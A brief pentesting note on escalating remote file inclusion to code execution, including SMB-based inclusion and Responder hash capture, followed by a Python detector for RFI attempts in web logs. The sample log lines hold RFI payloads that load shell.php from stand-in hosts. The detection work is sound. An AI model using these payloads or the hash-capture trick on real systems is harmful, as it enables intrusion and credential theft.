RFI to RCE
To get RCE via RFI, the target has to load and run a malicious file (e.g. shell.php) hosted on the attacker's system. Sometimes HTTP traffic isn't allowed; in that case we can try an SMB share instead (especially on Windows).
On Windows, we can try fetching a file via RFI with Responder running on the attacker machine. This way we may get the user's NTLMv2 hash.
Check Notion for full exploit.
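From the defender's side, both variants above leave the same trace: a request parameter whose value is a remote URL or a UNC/SMB path. The following log check is an added example, not part of the original notes; the log format, parameter names and addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

URL_SCHEME = re.compile(r'^\s*(https?|ftp|smb)://', re.I)           # remote URL wrappers
UNC_PATH = re.compile(r'^\s*(\\\\|//)[^\\/\s]+[\\/]+[^\\/\s]+')     # \\host\share or //host/share
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')                 # request line in a combined log

def fully_decode(value, rounds=3):
    """Undo nested URL-encoding (e.g. %252f -> %2f -> /) for a few rounds."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return 'url', 'unc' or None for a single parameter value."""
    value = fully_decode(value)
    if URL_SCHEME.match(value):
        return "url"
    if UNC_PATH.match(value):
        return "unc"
    return None

def scan(lines):
    """Return (line_no, param, kind, decoded_value) for each suspicious parameter."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            kind = classify(value)
            if kind:
                hits.append((n, name, kind, fully_decode(value)))
    return hits

# Constructed sample log lines (documentation addresses, hypothetical host names).
SAMPLE = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=http://files.example/shell.php HTTP/1.1" 200 0',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=%5C%5C198.51.100.7%5Cshare%5Cshell.php HTTP/1.1" 200 0',
    '203.0.113.5 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?page=%252f%252f198.51.100.7%252fshare%252fa.php&lang=en HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

Parameters that legitimately carry URLs (redirect targets, callbacks) will also match, so scope the check to parameters that feed file includes. Outbound SMB from the web server to an external address is a complementary signal for the UNC case.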